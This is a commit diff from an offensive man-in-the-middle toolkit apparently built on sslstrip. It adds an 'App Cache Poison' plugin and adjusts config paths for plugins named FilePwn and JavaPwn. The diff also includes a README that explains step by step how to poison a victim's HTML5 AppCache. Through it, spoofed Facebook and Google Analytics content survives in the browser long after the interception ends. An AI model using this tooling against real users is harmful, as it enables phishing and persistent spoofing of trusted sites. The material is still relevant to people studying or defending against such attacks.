AppCachePoison is now a plugin and cleaned dir tree

plugins/AppCachePoison.py

@@ -0,0 +1,21 @@
+from plugins.plugin import Plugin
+from sslstrip.ResponseTampererFactory import ResponseTampererFactory
+
+class AppCachePlugin(Plugin):
+    name = "App Cache Poison"
+    optname = "app"
+    desc = "Performs App Cache Poisoning attacks"
+    has_opts = True
+    def initialize(self,options):
+        '''Called if plugin is enabled, passed the options namespace'''
+        self.options = options
+        self.config_file = options.tampercfg
+
+        if self.config_file == None:
+            self.config_file = "./config_files/app_cache_poison.cfg"
+
+        print "[*] App Cache Poison plugin online"
+        ResponseTampererFactory.buildTamperer(self.config_file)
+
+    def add_options(self, options):
+        options.add_argument("--tampercfg", type=file, help="Specify a config file")

plugins/FilePwn.py

@@ -45,7 +45,7 @@ class FilePwn(Plugin):
         #NOT USED NOW
         #self.supportedBins = ('MZ', '7f454c46'.decode('hex'))
         
-        self.userConfig = ConfigObj('filepwn.cfg')
+        self.userConfig = ConfigObj('./config_files/filepwn.cfg')
         self.FileSizeMax = self.userConfig['targets']['ALL']['FileSizeMax']
         self.WindowsIntelx86 = self.userConfig['targets']['ALL']['WindowsIntelx86']
         self.WindowsIntelx64 = self.userConfig['targets']['ALL']['WindowsIntelx64']

plugins/JavaPwn.py

@@ -1,12 +1,12 @@
 from plugins.plugin import Plugin
 from plugins.BrowserProfiler import BrowserProfiler
 from time import sleep
+import libs.msfrpc
 import string
 import random
 import threading
 import logging
 import sys, os
-import msfrpc
 
 class JavaPwn(BrowserProfiler, Plugin):
     name = "JavaPwn"

plugins/app_cache_poison.README

@@ -0,0 +1,44 @@
+I've modified sslstrip to be able to tamper with server responses.
+
+One prepared example of tampering attack is HTML5 AppCache poisoning attack that places the 
+modified responses in browsers long-lasting HTML5 AppCache so that the spoofing continues
+even after the victim is no longer MITMed. 
+
+Exemplary response tampering with HTML AppCachePoison:
+
+	1) python sslstrip.py -t app_cache_poison/config.ini
+
+	2) While under MITM, visit http://example.com to display tampered content
+
+	3) Visit http://www.facebook.com in AppCache supporting browser (Chrome, Firefox, Opera, Safari).
+		In Firefox you have to agree to store offline content, Chrome does not display any confirmations.
+
+	4) Stop MITM, restart browser, go for coffee or holidays
+
+	5) Visit http://www.facebook.com again - the spoofed content is still there!
+	
+	As a bonus, once google analytics HTTP version will be requested, the spoofed content of it will be cached for 10 years.
+
+
+EASY LOCAL TESTING MITM (for Ubuntu systems):
+
+# create sslstrip admin user
+
+# forward local traffic
+$ sudo ./testmitm.sh start `id -u sslstrip`
+
+# run sslstrip to hijack traffic
+$ chown -R sslstrip /path/to/sslstrip/
+$ su sslstrip
+$ python sslstrip.py -t app_cache_poison/config.ini -p
+
+# stop
+$ sudo ./testmitm.sh stop
+
+
+More info:
+	http://blog.kotowicz.net/2010/12/squid-imposter-phishing-websites.html
+
+This functionality has been added by Krzysztof Kotowicz
+<kkotowicz at gmail dot com>
+